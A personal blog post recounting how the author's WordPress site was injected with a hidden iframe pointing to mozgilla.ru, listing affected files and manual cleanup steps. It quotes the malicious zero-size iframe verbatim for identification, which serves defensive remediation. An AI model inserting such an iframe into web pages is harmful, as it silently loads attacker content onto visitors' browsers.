OK, so straight to the point. This morning my blog – a wordpress installation – was dead. I was getting whether an “access denied” or “you don’t have permission to access…”. First I thought that the blog got screwed somehow and I tried to go into the admin panel (e.g. georgezamfir.com/wp-admin/)… aaand I got the same error code. Crap. At this point I was clueless, I searched online for any netfirms issues, I thought they messed up something, nothing.

All right, back to basics, I FTP-ed to my host to take a look at the files and this is when I realized that all my index.* (index.php, index.html, index.htm, etc) files were screwed. There were no permissions set and they all contained some code linking to mozgilla.ru – that code was not familiar to me.  Duh, I don’t use iframes. There isn’t much online on this thing except for this page: badwarebusters.org/main/itemview/11308.

I was having the exact same code in my files:
<iframe frameborder=”0″ onload=”if (!this.src){ this.src=’http://mozgilla.ru:8080/index.php’; this.height=’0′; this.width=’0′;}” >klsgawbozfesywooikgbcetdnwaubys</iframe>
However, in the .php files the code above was at the very end of the files but in the .html files the code was right after the <body> tag.

Now, as mentioned in the article above the code could be “injected by script” directly inside the files or through .htacess when the pages are requested. In my case the code was injected directly in the files (thank god) and I manually removed the code.

For wordpress installations/blogs, the following files (remember to set the permissions first, otherwise you won’t be able to edit the files) are being affected:
/index.php
/wp-admin/index-extra.php
/wp-admin/index.php
/wp-content/index.php
/wp-content/themes/index.php
/wp-content/themes/{all themes folders}/index.php (I simply removed the themes I didn’t need
/wp-includes/default-filters.php
/wp-includes/default-widgets.php

Also, in my case I didn’t have to change the .htaccess (in the wordpress folder) as it should look something like the below code. You need these lines for the permalinks, don’t delete them.

# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress

So, this is the (manual) way of saving your website from the pesky mozgilla hack:

• find the “corrupted” files (easy, sort by date – recently modified files have the code),
• set the right permissions (chmod 644 index.php) and
• manually remove the code from the files.

I hope this helps others as I was going nuts trying to find the solution. And btw, I found the solution but I still don’t know what the problem is. However, here are some tips from Google on this subject.